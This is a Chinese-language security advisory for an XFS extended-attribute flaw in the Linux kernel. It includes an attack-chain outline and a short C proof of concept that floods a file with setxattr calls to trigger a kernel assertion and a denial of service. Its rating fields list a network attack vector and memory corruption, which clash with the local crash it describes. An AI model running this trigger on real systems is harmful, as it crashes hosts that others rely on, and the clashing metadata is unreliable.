CVE-2026-43158 CVSS 8.8 高危

CVE-2026-43158 Linux内核XFS文件系统逻辑错误漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43158

漏洞类型

内存破坏

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核XFS文件系统在处理扩展属性时存在逻辑缺陷。当添加xattr导致叶块条目增长时，freemap调整机制未能正确处理空闲空间与条目数组的边界，引发内存布局冲突。低权限攻击者可利用此漏洞触发内核断言，导致系统崩溃或拒绝服务。

技术细节

漏洞源于Linux内核XFS文件系统`xfs_attr3_leaf_add_work`函数中的freemap管理逻辑错误。freemap数组旨在追踪部分空闲空间，但当条目数组增长并覆盖freemap[1]标记的区域时，若未及时更新，会导致名称区域起始地址计算错误，甚至低于条目数组的结束地址。攻击者可通过`fsstress`或编写特定程序，不断向XFS文件系统写入namelen=3、valuelen=71的扩展属性。这将导致内核检测到内存布局冲突，触发ASSERT断言失败，进而导致内核恐慌或文件系统强制关闭，造成拒绝服务。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用Linux内核并挂载了XFS文件系统。

STEP 2

准备

攻击者编写或获取利用脚本，该脚本反复调用setxattr接口，设置特定长度（名称长度3，值长度71）的扩展属性。

STEP 3

执行

攻击者在目标系统上运行脚本，利用低权限账户向XFS文件系统中的文件写入大量 crafted xattrs。

STEP 4

影响

内核在处理叶块freemap调整时触发ASSERT断言失败，导致文件系统强制卸载或系统崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <sys/xattr.h>
#include <string.h>

// PoC for CVE-2026-43158
// Triggers the assertion in xfs_attr3_leaf_add_work
// by setting xattrs with specific sizes (namelen=3, valuelen=71).

int main() {
    const char *filename = "testfile_xfs_poc";
    FILE *fp = fopen(filename, "w");
    if (!fp) {
        perror("fopen failed");
        return 1;
    }
    fclose(fp);

    char name_template[4] = "aaa"; // namelen=3
    char value[72]; // valuelen=71
    memset(value, 'A', 71);
    value[71] = '\0';

    printf("Starting PoC for CVE-2026-43158...\n");

    // Loop to fill the leaf block and trigger the corruption
    for (int i = 0; i < 10000; i++) {
        // Create unique attribute names to force allocation
        char attr_name[32];
        snprintf(attr_name, sizeof(attr_name), "user.%s%d", name_template, i);
        
        if (setxattr(filename, attr_name, value, 71, 0) != 0) {
            // Expected to fail eventually when block is full or crash occurs
            // perror("setxattr"); 
        }
    }

    printf("Exploit attempt finished. Check system logs for kernel panic or assertion failure.\n");
    remove(filename);
    return 0;
}

影响范围

Linux Kernel (Stable branches prior to fix)

Linux Kernel (Mainline versions prior to commit 2a2b5932db6758)

防御指南

临时缓解措施

建议立即应用Linux内核官方提供的补丁（参考提供的Git提交链接）。如果无法立即升级，应严格限制非管理员用户对XFS文件系统的操作权限，以降低被利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表